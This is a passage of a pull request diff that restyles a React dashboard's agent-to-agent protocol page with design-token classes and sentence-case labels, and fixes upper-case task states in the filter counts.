### PR TITLE
Glasshouse MCP and A2A pages, with the ABOM print export escaped

### DIFF
--- a/apps/web/app/dashboard/a2a/page.tsx
+++ b/apps/web/app/dashboard/a2a/page.tsx
@@ -51,6 +51,7 @@ import { formatDateTime, formatRelativeTime } from "@/lib/date-utils";
 import { getErrorMessage } from "@/lib/error-messages";
 import { AuthGuard } from "@/components/auth-guard";
 import { ConfirmDialog } from "@/components/modals/confirm-dialog";
+import { buttonVariants } from "@/components/ui/button";
 import {
   BarChart,
   Bar,
@@ -90,9 +91,18 @@ interface TabConfig {
   description: string;
 }
 
+// Glass tooltip chrome for recharts. Colors come from tokens, never hex literals.
+const CHART_TOOLTIP_STYLE = {
+  backgroundColor: "var(--glass-fill)",
+  border: "1px solid var(--glass-border)",
+  borderRadius: "12px",
+  boxShadow: "var(--shadow-card)",
+  color: "var(--text-primary)",
+} as const;
+
 const TABS: TabConfig[] = [
   { id: "overview", label: "Overview", icon: BarChart3, description: "A2A protocol dashboard and analytics" },
-  { id: "cards", label: "Agent Cards", icon: Link2, description: "Registered A2A agent cards" },
+  { id: "cards", label: "Agent cards", icon: Link2, description: "Registered A2A agent cards" },
   { id: "consent", label: "Consent", icon: ShieldCheck, description: "GDPR/PSD2 consent management" },
   { id: "tasks", label: "Tasks", icon: Activity, description: "A2A task history and audit trail" },
   { id: "trust", label: "Trust", icon: Network, description: "Peer trust relationships" },
@@ -105,23 +115,23 @@ const TABS: TabConfig[] = [
 
 function StatCard({ stat }: { stat: { name: string; value: string | number; icon: React.ElementType; change?: string; changeType?: "positive" | "negative" } }) {
   return (
-    <div className="bg-white dark:bg-gray-800 p-6 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm">
+    <div className="glass p-6">
       <div className="flex items-center">
         <div className="flex-shrink-0">
-          <stat.icon className="h-6 w-6 text-gray-400" />
+          <stat.icon className="h-6 w-6 text-ink-tertiary" />
         </div>
         <div className="ml-5 w-0 flex-1">
           <dl>
-            <dt className="text-sm font-medium text-gray-500 dark:text-gray-400 truncate">
+            <dt className="text-sm font-medium text-ink-secondary truncate">
               {stat.name}
             </dt>
             <dd className="flex items-baseline">
-              <div className="text-2xl font-semibold text-gray-900 dark:text-gray-100">
+              <div className="text-2xl font-semibold text-ink">
                 {stat.value}
               </div>
               {stat.change && (
                 <div className={`ml-2 flex items-baseline text-sm font-semibold ${
-                  stat.changeType === "positive" ? "text-green-600" : "text-red-600"
+                  stat.changeType === "positive" ? "text-success-text" : "text-danger-text"
                 }`}>
                   {stat.change}
                 </div>
@@ -140,20 +150,20 @@ function StatusBadge({ status, size = "sm" }: { status: string; size?: "sm" | "m
       case "verified":
       case "granted":
       case "completed":
-        return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
+        return "border border-success-border bg-success-fill text-success-text";
       case "pending":
       case "submitted":
       case "working":
-        return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
+        return "border border-warning-border bg-warning-fill text-warning-text";
       case "revoked":
       case "denied":
       case "failed":
       case "cancelled":
-        return "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300";
+        return "border border-danger-border bg-danger-fill text-danger-text";
       case "input_needed":
-        return "bg-blue-100 dark:bg-blue-900/30 text-blue-800 dark:text-blue-300";
+        return "border border-stroke bg-brand-soft text-brand-text";
       default:
-        return "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300";
+        return "border border-stroke bg-glass-inset-gray text-ink-body";
     }
   };
 
@@ -185,7 +195,7 @@ function StatusBadge({ status, size = "sm" }: { status: string; size?: "sm" | "m
   const sizeClass = size === "md" ? "px-3 py-1 text-sm" : "px-2.5 py-0.5 text-xs";
 
   return (
-    <span className={`inline-flex items-center gap-1 ${sizeClass} rounded-full font-medium capitalize ${getStyles()}`}>
+    <span className={`inline-flex items-center gap-1 ${sizeClass} rounded-pill font-medium capitalize ${getStyles()}`}>
       <Icon className={size === "md" ? "h-4 w-4" : "h-3 w-3"} />
       {status.replace("_", " ")}
     </span>
@@ -194,15 +204,15 @@ function StatusBadge({ status, size = "sm" }: { status: string; size?: "sm" | "m
 
 function TrustScoreBadge({ score, size = "sm" }: { score: number; size?: "sm" | "md" }) {
   const getColor = () => {
-    if (score >= 0.8) return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
-    if (score >= 0.5) return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
-    return "bg-red-100 dark:bg-red-900/30 text-red-800 dark:text-red-300";
+    if (score >= 0.8) return "border border-success-border bg-success-fill text-success-text";
+    if (score >= 0.5) return "border border-warning-border bg-warning-fill text-warning-text";
+    return "border border-danger-border bg-danger-fill text-danger-text";
   };
 
   const sizeClass = size === "md" ? "px-3 py-1 text-sm" : "px-2.5 py-0.5 text-xs";
 
   return (
-    <span className={`inline-flex items-center ${sizeClass} rounded-full font-medium ${getColor()}`}>
+    <span className={`inline-flex items-center ${sizeClass} rounded-pill font-medium ${getColor()}`}>
       {(score * 100).toFixed(0)}%
     </span>
   );
@@ -216,15 +226,15 @@ function EmptyState({ icon: Icon, title, description, action }: {
 }) {
   return (
     <div className="text-center py-12 space-y-4">
-      <Icon className="mx-auto h-12 w-12 text-gray-400" />
+      <Icon className="mx-auto h-12 w-12 text-ink-tertiary" />
       <div>
-        <h3 className="text-sm font-medium text-gray-900 dark:text-gray-100">{title}</h3>
-        <p className="mt-1 text-sm text-gray-500 dark:text-gray-400">{description}</p>
+        <h3 className="text-sm font-medium text-ink">{title}</h3>
+        <p className="mt-1 text-sm text-ink-secondary">{description}</p>
       </div>
       {action && (
         <button
           onClick={action.onClick}
-          className="px-4 py-2 bg-blue-600 text-white rounded-lg hover:bg-blue-700 transition-colors text-sm"
+          className={buttonVariants({ size: "sm" })}
         >
           {action.label}
         </button>
@@ -236,7 +246,7 @@ function EmptyState({ icon: Icon, title, description, action }: {
 function LoadingState() {
   return (
     <div className="flex items-center justify-center py-12">
-      <Loader2 className="h-8 w-8 animate-spin text-blue-600" />
+      <Loader2 className="h-8 w-8 animate-spin text-brand-text" />
     </div>
   );
 }
@@ -246,7 +256,7 @@ function LoadingState() {
 function ChartLoading({ className = "h-full" }: { className?: string }) {
   return (
     <div className={`flex items-center justify-center ${className}`}>
-      <Loader2 className="h-6 w-6 animate-spin text-blue-600" />
+      <Loader2 className="h-6 w-6 animate-spin text-brand-text" />
     </div>
   );
 }
@@ -271,21 +281,21 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
   }), [agentCards]);
 
   const statCards = [
-    { name: "Agent Cards", value: stats.totalCards, icon: Link2 },
+    { name: "Agent cards", value: stats.totalCards, icon: Link2 },
     { name: "Verified", value: stats.verifiedCards, icon: BadgeCheck },
-    { name: "AIM Attested", value: stats.withAttestation, icon: Shield },
-    { name: "Total Skills", value: stats.totalSkills, icon: Zap },
+    { name: "AIM attested", value: stats.withAttestation, icon: Shield },
+    { name: "Total skills", value: stats.totalSkills, icon: Zap },
   ];
 
   const taskStateData = useMemo(() => {
     const counts: Record<string, number> = {};
     tasks.forEach(t => { counts[t.state] = (counts[t.state] || 0) + 1; });
     const colorMap: Record<string, string> = {
-      COMPLETED: "#22c55e", WORKING: "#eab308", FAILED: "#ef4444",
-      SUBMITTED: "#3b82f6", CANCELLED: "#6b7280", INPUT_NEEDED: "#8b5cf6",
+      COMPLETED: "var(--green)", WORKING: "var(--amber)", FAILED: "var(--red)",
+      SUBMITTED: "var(--brand)", CANCELLED: "var(--text-secondary)", INPUT_NEEDED: "var(--brand-indigo)",
     };
     return Object.entries(counts).map(([name, value]) => ({
-      name, value, fill: colorMap[name] || "#94a3b8",
+      name, value, fill: colorMap[name] || "var(--text-tertiary)",
     }));
   }, [tasks]);
 
@@ -317,9 +327,9 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
       {/* Charts Row */}
       <div className="grid grid-cols-1 lg:grid-cols-2 gap-6">
         {/* Task State Distribution */}
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
-          <h3 className="text-lg font-medium text-gray-900 dark:text-gray-100 mb-4">
-            Task State Distribution
+        <div className="glass p-6">
+          <h3 className="text-lg font-medium text-ink mb-4">
+            Task state distribution
           </h3>
           <div className="h-64">
             {tasksLoading ? <ChartLoading /> : (
@@ -339,7 +349,7 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
                     <Cell key={`cell-${index}`} fill={entry.fill} />
                   ))}
                 </Pie>
-                <Tooltip />
+                <Tooltip contentStyle={CHART_TOOLTIP_STYLE} />
               </PieChart>
             </ResponsiveContainer>
             )}
@@ -347,19 +357,19 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
         </div>
 
         {/* Trust Score Distribution */}
-        <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-6">
-          <h3 className="text-lg font-medium text-gray-900 dark:text-gray-100 mb-4">
-            Trust Score Distribution
+        <div className="glass p-6">
+          <h3 className="text-lg font-medium text-ink mb-4">
+            Trust score distribution
           </h3>
           <div className="h-64">
             {trustLoading ? <ChartLoading /> : (
             <ResponsiveContainer width="100%" height="100%">
               <BarChart data={trustDistData}>
-                <CartesianGrid strokeDasharray="3 3" className="stroke-gray-200 dark:stroke-gray-700" />
-                <XAxis dataKey="range" className="text-xs" />
-                <YAxis className="text-xs" />
-                <Tooltip />
-                <Bar dataKey="count" fill="#3b82f6" radius={[4, 4, 0, 0]} />
+                <CartesianGrid strokeDasharray="3 3" className="stroke-divider" />
+                <XAxis dataKey="range" className="text-xs" stroke="var(--text-tertiary)" />
+                <YAxis className="text-xs" stroke="var(--text-tertiary)" />
+                <Tooltip contentStyle={CHART_TOOLTIP_STYLE} cursor={{ fill: "var(--surface-inset-gray)" }} />
+                <Bar dataKey="count" fill="var(--brand)" radius={[4, 4, 0, 0]} />
               </BarChart>
             </ResponsiveContainer>
             )}
@@ -368,32 +378,32 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
       </div>
 
       {/* A2A Protocol Info */}
-      <div className="bg-gradient-to-r from-blue-50 to-indigo-50 dark:from-blue-900/20 dark:to-indigo-900/20 border border-blue-200 dark:border-blue-800 rounded-lg p-6">
+      <div className="glass p-6">
         <div className="flex items-start gap-4">
-          <div className="flex-shrink-0 bg-blue-100 dark:bg-blue-900/50 p-3 rounded-lg">
-            <Network className="h-6 w-6 text-blue-600 dark:text-blue-400" />
+          <div className="flex-shrink-0 bg-brand-soft p-3 rounded-inset">
+            <Network className="h-6 w-6 text-brand-text" />
           </div>
           <div className="flex-1">
-            <h3 className="text-lg font-semibold text-blue-900 dark:text-blue-100">
-              A2A Protocol with AIM Security
+            <h3 className="text-lg font-semibold text-ink">
+              A2A protocol with AIM security
             </h3>
-            <p className="mt-2 text-sm text-blue-800 dark:text-blue-200">
+            <p className="mt-2 text-sm text-ink-body">
               The Agent-to-Agent (A2A) protocol enables secure communication between AI agents.
               AIM enhances A2A with cryptographic attestation, trust scoring, and recorded, revocable
               consent for agent-to-agent data sharing.
             </p>
             <div className="mt-4 flex flex-wrap gap-3">
-              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-full text-xs font-medium bg-blue-100 dark:bg-blue-900/50 text-blue-800 dark:text-blue-200">
-                <Shield className="h-3 w-3" /> Ed25519 Signatures
+              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-pill text-xs font-medium bg-brand-soft text-brand-text">
+                <Shield className="h-3 w-3" /> Ed25519 signatures
               </span>
-              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-full text-xs font-medium bg-green-100 dark:bg-green-900/50 text-green-800 dark:text-green-200">
-                <ShieldCheck className="h-3 w-3" /> Consent Records
+              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-pill text-xs font-medium bg-success-fill text-success-text">
+                <ShieldCheck className="h-3 w-3" /> Consent records
               </span>
-              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-full text-xs font-medium bg-purple-100 dark:bg-purple-900/50 text-purple-800 dark:text-purple-200">
-                <TrendingUp className="h-3 w-3" /> Trust Scoring
+              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-pill text-xs font-medium bg-brand-soft text-brand-text">
+                <TrendingUp className="h-3 w-3" /> Trust scoring
               </span>
-              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-full text-xs font-medium bg-orange-100 dark:bg-orange-900/50 text-orange-800 dark:text-orange-200">
-                <Activity className="h-3 w-3" /> Task Audit Trail
+              <span className="inline-flex items-center gap-1 px-3 py-1 rounded-pill text-xs font-medium bg-glass-inset-gray text-ink-body">
+                <Activity className="h-3 w-3" /> Task audit trail
               </span>
             </div>
           </div>
@@ -401,10 +411,10 @@ function OverviewTab({ agentCards, tasks, trustScores, cardsLoading, tasksLoadin
             href="https://google.github.io/A2A/"
             target="_blank"
             rel="noopener noreferrer"
-            className="flex items-center gap-2 px-4 py-2 text-blue-600 dark:text-blue-400 border border-blue-300 dark:border-blue-700 rounded-lg hover:bg-blue-100 dark:hover:bg-blue-900/30 transition-colors text-sm"
+            className="flex items-center gap-2 px-4 py-2 rounded-pill border border-stroke text-sm font-semibold text-brand-text transition-colors hover:bg-brand-soft"
           >
             <ExternalLink className="h-4 w-4" />
-            A2A Spec
+            A2A spec
           </a>
         </div>
       </div>
@@ -441,56 +451,56 @@ function AgentCardsTab({ agentCards, loading, onRefresh, onDelete }: {
       {/* Filters */}
       <div className="flex flex-col sm:flex-row gap-4">
         <div className="flex-1 relative">
-          <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-gray-400" />
+          <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
           <input
             type="text"
             placeholder="Search by name or URL..."
             value={searchTerm}
             onChange={(e) => setSearchTerm(e.target.value)}
-            className="w-full pl-10 pr-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:ring-2 focus:ring-blue-500 focus:border-transparent"
+            className="w-full pl-10 pr-4 py-2 border border-stroke rounded-inset bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-ring focus:border-transparent"
           />
         </div>
         <select
           value={statusFilter}
           onChange={(e) => setStatusFilter(e.target.value)}
-          className="px-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:ring-2 focus:ring-blue-500"
+          className="px-4 py-2 border border-stroke rounded-inset bg-glass-inset text-ink focus:outline-none focus:ring-2 focus:ring-ring"
         >
-          <option value="all">All Status</option>
+          <option value="all">All statuses</option>
           <option value="verified">Verified</option>
           <option value="pending">Pending</option>
         </select>
       </div>
 
       {/* Cards Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
+      <div className="glass overflow-hidden">
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Agent</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">URL</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Status</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Skills</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Attestation</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Actions</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Agent</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">URL</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Status</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Skills</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Attestation</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Actions</th>
               </tr>
             </thead>
-            <tbody className="divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {filteredCards.map((card) => (
-                <tr key={card.id} className="hover:bg-gray-50 dark:hover:bg-gray-800/50">
+                <tr key={card.id} className="hover:bg-glass-inset-gray">
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-3">
-                      <div className="h-8 w-8 bg-blue-100 dark:bg-blue-900/30 rounded-lg flex items-center justify-center">
-                        <Bot className="h-4 w-4 text-blue-600 dark:text-blue-400" />
+                      <div className="h-8 w-8 bg-brand-soft rounded-inset-sm flex items-center justify-center">
+                        <Bot className="h-4 w-4 text-brand-text" />
                       </div>
                       <div>
-                        <div className="text-sm font-medium text-gray-900 dark:text-gray-100">{card.name}</div>
-                        <div className="text-xs text-gray-500 dark:text-gray-400">v{card.version || "1.0"}</div>
+                        <div className="text-sm font-medium text-ink">{card.name}</div>
+                        <div className="text-xs text-ink-tertiary">v{card.version || "1.0"}</div>
                       </div>
                     </div>
                   </td>
                   <td className="px-4 py-3">
-                    <a href={card.url} target="_blank" rel="noopener noreferrer" className="text-sm text-blue-600 dark:text-blue-400 hover:underline flex items-center gap-1">
+                    <a href={card.url} target="_blank" rel="noopener noreferrer" className="text-sm text-brand-text hover:underline flex items-center gap-1">
                       <Globe className="h-3 w-3" />
                       <span className="truncate max-w-[200px]">{card.url}</span>
                     </a>
@@ -500,26 +510,26 @@ function AgentCardsTab({ agentCards, loading, onRefresh, onDelete }: {
                   </td>
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-1">
-                      <Zap className="h-3 w-3 text-gray-400" />
-                      <span className="text-sm text-gray-900 dark:text-gray-100">{card.skills?.length || 0}</span>
+                      <Zap className="h-3 w-3 text-ink-tertiary" />
+                      <span className="text-sm text-ink">{card.skills?.length || 0}</span>
                     </div>
                   </td>
                   <td className="px-4 py-3">
                     {card.aimAttestation ? (
-                      <span className="inline-flex items-center gap-1 text-xs text-green-600 dark:text-green-400">
+                      <span className="inline-flex items-center gap-1 text-xs text-success-text">
                         <Shield className="h-3 w-3" />
-                        AIM Attested
+                        AIM attested
                       </span>
                     ) : (
-                      <span className="text-xs text-gray-400">—</span>
+                      <span className="text-xs text-ink-tertiary">—</span>
                     )}
                   </td>
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-2">
-                      <button onClick={() => onRefresh(card)} className="p-1 text-gray-400 hover:text-blue-600 transition-colors" title="Refresh">
+                      <button onClick={() => onRefresh(card)} className="p-1 text-ink-tertiary hover:text-brand-text transition-colors" title="Refresh">
                         <RefreshCw className="h-4 w-4" />
                       </button>
-                      <button onClick={() => onDelete(card)} className="p-1 text-gray-400 hover:text-red-600 transition-colors" title="Delete">
+                      <button onClick={() => onDelete(card)} className="p-1 text-ink-tertiary hover:text-danger-text transition-colors" title="Delete">
                         <Trash2 className="h-4 w-4" />
                       </button>
                     </div>
@@ -572,12 +582,12 @@ function ConsentTab({ consents: initialConsents, loading }: { consents: A2AConse
   return (
     <div className="space-y-6">
       {/* Info Banner */}
-      <div className="bg-green-50 dark:bg-green-900/20 border border-green-200 dark:border-green-800 rounded-lg p-4">
+      <div className="bg-success-fill border border-success-border rounded-card p-4">
         <div className="flex items-start gap-3">
-          <ShieldCheck className="h-5 w-5 text-green-600 dark:text-green-400 flex-shrink-0 mt-0.5" />
+          <ShieldCheck className="h-5 w-5 text-success-text flex-shrink-0 mt-0.5" />
           <div>
-            <h3 className="text-sm font-medium text-green-800 dark:text-green-200">GDPR/PSD2 Compliant Consent Management</h3>
-            <p className="text-sm text-green-700 dark:text-green-300 mt-1">
+            <h3 className="text-sm font-medium text-success-text">GDPR/PSD2 compliant consent management</h3>
+            <p className="text-sm text-ink-body mt-1">
               All cross-agent data sharing requires explicit user consent. Consents are tracked with full audit trail,
               expiration management, and revocation support.
             </p>
@@ -588,59 +598,59 @@ function ConsentTab({ consents: initialConsents, loading }: { consents: A2AConse
       {/* Search */}
       <div className="flex gap-4">
         <div className="flex-1 relative">
-          <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-gray-400" />
+          <Search className="absolute left-3 top-1/2 transform -translate-y-1/2 h-4 w-4 text-ink-tertiary" />
           <input
             type="text"
             placeholder="Search by user ID..."
             value={userIdFilter}
             onChange={(e) => setUserIdFilter(e.target.value)}
-            className="w-full pl-10 pr-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:ring-2 focus:ring-blue-500"
+            className="w-full pl-10 pr-4 py-2 border border-stroke rounded-inset bg-glass-inset text-ink placeholder:text-ink-tertiary focus:outline-none focus:ring-2 focus:ring-ring"
           />
         </div>
       </div>
 
       {/* Consents Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
+      <div className="glass overflow-hidden">
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">User</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Agents</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Purpose</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Data Types</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Status</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Expires</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">User</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Agents</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Purpose</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Data types</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Status</th>
+                <th className="px-4 py-3 text-left text-xs font-medium text-ink-tertiary uppercase">Expires</th>
               </tr>
             </thead>
-            <tbody className="divide-y divide-gray-200 dark:divide-gray-700">
+            <tbody className="divide-y divide-divider">
               {displayConsents.map((consent) => (
-                <tr key={consent.id} className="hover:bg-gray-50 dark:hover:bg-gray-800/50">
+                <tr key={consent.id} className="hover:bg-glass-inset-gray">
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-2">
-                      <Users className="h-4 w-4 text-gray-400" />
-                      <span className="text-sm text-gray-900 dark:text-gray-100">{consent.userId}</span>
+                      <Users className="h-4 w-4 text-ink-tertiary" />
+                      <span className="text-sm text-ink">{consent.userId}</span>
                     </div>
                   </td>
                   <td className="px-4 py-3">
                     <div className="flex items-center gap-1 text-sm">
-                      <span className="text-gray-900 dark:text-gray-100">{consent.sourceAgentId.slice(0, 8)}...</span>
-                      <ArrowRight className="h-3 w-3 text-gray-400" />
-                      <span className="text-gray-900 dark:text-gray-100">{consent.targetAgentId.slice(0, 8)}...</span>
+                      <span className="text-ink">{consent.sourceAgentId.slice(0, 8)}...</span>
+                      <ArrowRight className="h-3 w-3 text-ink-tertiary" />
+                      <span className="text-ink">{consent.targetAgentId.slice(0, 8)}...</span>
                     </div>
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-900 dark:text-gray-100">{consent.purpose}</span>
+                    <span className="text-sm text-ink">{consent.purpose}</span>
                   </td>
                   <td className="px-4 py-3">
                     <div className="flex flex-wrap gap-1">
                       {consent.dataTypes.slice(0, 2).map((type) => (
-                        <span key={type} className="px-2 py-0.5 bg-gray-100 dark:bg-gray-700 rounded text-xs text-gray-700 dark:text-gray-300">
+                        <span key={type} className="px-2 py-0.5 bg-glass-inset-gray rounded text-xs text-ink-body">
                           {type}
                         </span>
                       ))}
                       {consent.dataTypes.length > 2 && (
-                        <span className="px-2 py-0.5 bg-gray-100 dark:bg-gray-700 rounded text-xs text-gray-500">
+                        <span className="px-2 py-0.5 bg-glass-inset-gray rounded text-xs text-ink-tertiary">
                           +{consent.dataTypes.length - 2}
                         </span>
                       )}
@@ -650,7 +660,7 @@ function ConsentTab({ consents: initialConsents, loading }: { consents: A2AConse
                     <StatusBadge status={consent.status} />
                   </td>
                   <td className="px-4 py-3">
-                    <span className="text-sm text-gray-500 dark:text-gray-400">
+                    <span className="text-sm text-ink-secondary">
                       {consent.expiresAt ? formatRelativeTime(consent.expiresAt) : "Never"}
                     </span>
                   </td>
@@ -667,11 +677,12 @@ function ConsentTab({ consents: initialConsents, loading }: { consents: A2AConse
 function TasksTab({ tasks, loading }: { tasks: A2ATask[]; loading: boolean }) {
   const [stateFilter, setStateFilter] = useState("all");
 
-  const filteredTasks = stateFilter === "all" ? tasks : tasks.filter(t => t.state === stateFilter);
+  // Task states arrive upper-case from the backend; the counts and the filter compare lower-case.
+  const filteredTasks = stateFilter === "all" ? tasks : tasks.filter(t => (t.state || "").toLowerCase() === stateFilter);
 
   const stateCounts = useMemo(() => {
     const counts: Record<string, number> = {};
-    tasks.forEach(t => { counts[t.state] = (counts[t.state] || 0) + 1; });
+    tasks.forEach(t => { const key = (t.state || "").toLowerCase(); counts[key] = (counts[key] || 0) + 1; });
     return counts;
   }, [tasks]);
 
@@ -682,16 +693,16 @@ function TasksTab({ tasks, loading }: { tasks: A2ATask[]; loading: boolean }) {
       {/* Stats */}
       <div className="grid grid-cols-2 sm:grid-cols-4 lg:grid-cols-6 gap-3">
         {[
-          { label: "Total", value: tasks.length, color: "text-gray-900 dark:text-gray-100" },
-          { label: "Completed", value: stateCounts["completed"] || 0, color: "text-green-600" },
-          { label: "Working", value: stateCounts["working"] || 0, color: "text-yellow-600" },
-          { label: "Submitted", value: stateCounts["submitted"] || 0, color: "text-blue-600" },
-          { label: "Failed", value: stateCounts["failed"] || 0, color: "text-red-600" },
-          { label: "Cancelled", value: stateCounts["cancelled"] || 0, color: "text-gray-500" },
+          { label: "Total", value: tasks.length, color: "text-ink" },
+          { label: "Completed", value: stateCounts["completed"] || 0, color: "text-success-text" },
+          { label: "Working", value: stateCounts["working"] || 0, color: "text-warning-text" },
+          { label: "Submitted", value: stateCounts["submitted"] || 0, color: "text-brand-text" },
+          { label: "Failed", value: stateCounts["failed"] || 0, color: "text-danger-text" },
+          { label: "Cancelled", value: stateCounts["cancelled"] || 0, color: "text-ink-secondary" },
         ].map(s => (
-          <div key={s.label} className="bg-white dark:bg-gray-800 p-3 rounded-lg border border-gray-200 dark:border-gray-700 text-center">
+          <div key={s.label} className="glass p-3 text-center">
             <div className={`text-xl font-semibold ${s.color}`}>{s.value}</div>
-            <div className="text-xs text-gray-500 dark:text-gray-400">{s.label}</div>
+            <div className="text-xs text-ink-secondary">{s.label}</div>
           </div>
         ))}
       </div>
@@ -701,12 +712,12 @@ function TasksTab({ tasks, loading }: { tasks: A2ATask[]; loading: boolean }) {
         <select
           value={stateFilter}
           onChange={(e) => setStateFilter(e.target.value)}
-          className="px-4 py-2 border border-gray-300 dark:border-gray-600 rounded-lg bg-white dark:bg-gray-900 text-gray-900 dark:text-gray-100 focus:ring-2 focus:ring-blue-500"
+          className="px-4 py-2 border border-stroke rounded-inset bg-glass-inset text-ink focus:outline-none focus:ring-2 focus:ring-ring"
         >
-          <option value="all">All States ({tasks.length})</option>
+          <option value="all">All states ({tasks.length})</option>
           <option value="submitted">Submitted ({stateCounts["submitted"] || 0})</option>
           <option value="working">Working ({stateCounts["working"] || 0})</option>
-          <option value="input_needed">Input Needed ({stateCounts["input_needed"] || 0})</option>
+          <option value="input_needed">Input needed ({stateCounts["input_needed"] || 0})</option>
           <option value="completed">Completed ({stateCounts["completed"] || 0})</option>
           <option value="failed">Failed ({stateCounts["failed"] || 0})</option>
           <option value="cancelled">Cancelled ({stateCounts["cancelled"] || 0})</option>
@@ -714,49 +725,49 @@ function TasksTab({ tasks, loading }: { tasks: A2ATask[]; loading: boolean }) {
       </div>
 
       {/* Tasks Table */}
-      <div className="bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 overflow-hidden">
+      <div className="glass overflow-hidden">
         <div className="overflow-x-auto">
-          <table className="min-w-full divide-y divide-gray-200 dark:divide-gray-700">
-            <thead className="bg-gray-50 dark:bg-gray-800">
+          <table className="min-w-full divide-y divide-divider">
+            <thead className="bg-glass-inset-gray">
               <tr>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Task ID</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Client → Remote</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Skill</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">State</th>
-                <th className="px-4 py-3 text-left text-xs font-medium text-gray-500 dark:text-gray-400 uppercase">Messages</th>
